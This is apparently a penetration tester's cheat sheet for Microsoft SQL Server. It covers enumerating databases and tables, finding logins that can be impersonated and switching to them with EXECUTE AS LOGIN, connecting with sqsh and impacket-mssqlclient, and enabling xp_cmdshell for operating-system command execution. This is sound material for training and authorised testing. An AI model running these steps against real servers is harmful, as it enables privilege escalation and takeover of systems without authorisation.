select * from sys.databses;
- select name from sys.databases;
- select name from master..sysdatabases;
use <DB>;
select * from sys.tables;
- select name from sys.tables;
select * from <table>;
SELECT COLUMN_NAME, DATA_TYPE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = <TABLE>;
---
# enumerate db
enum_db
# select db
use <db>
# Check impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
# LOGIN as impersonate
EXECUTE AS LOGIN = 'hrappdb-reader'
# Enum tables
SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
sqsh
sqsh -S $IP -U $USER -P $PWD -h
sqsh -S $IP -U .\\\\$ACCOUNT_NAME -P $PWD -h
impacket-mssqlclient
impacket-mssqlclient -p $PORT $USER@$IP
impacket-mssqlclient -p $PORT $USER@$IP -windows-auth
impacket-mssqlclient $DOMAIN/$USER:$PWD@$IP
impacket-mssqlclient $DOMAIN/$USER:$PWD@$IP -windows-auth
When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don’t specify a domain or hostname, it will assume SQL Authentication and authenticate against the users created in the SQL Server. Instead, if we define the domain or hostname, it will use Windows Authentication. If we are targeting a local account, we can use SERVERNAME\\\\accountname or.\\\\accountname .
sqsh -S $IP -U .\\\\$accountname -P $PWD -h
If we use sqlcmd, we will need to use GO after our query to execute the SQL syntax.
SELECT name FROM master.dbo.sysdatabases;
GO
USE $DB
GO
xp_cmdshell is a powerful feature and disabled by default. It can be enabled and disabled by using the Policy-Based Management or by executing sp_configure# if xp_cmdshell not enabled
EXECUTE sp_configure 'show advanced options', 1
GO
# To update the currently configured value for advanced options
RECONFIGURE
GO
# To enable the feature
EXECUTE sp_configure 'xp_cmdshell', 1
# To update the currently configured value for this feature
RECONFIGURE
GO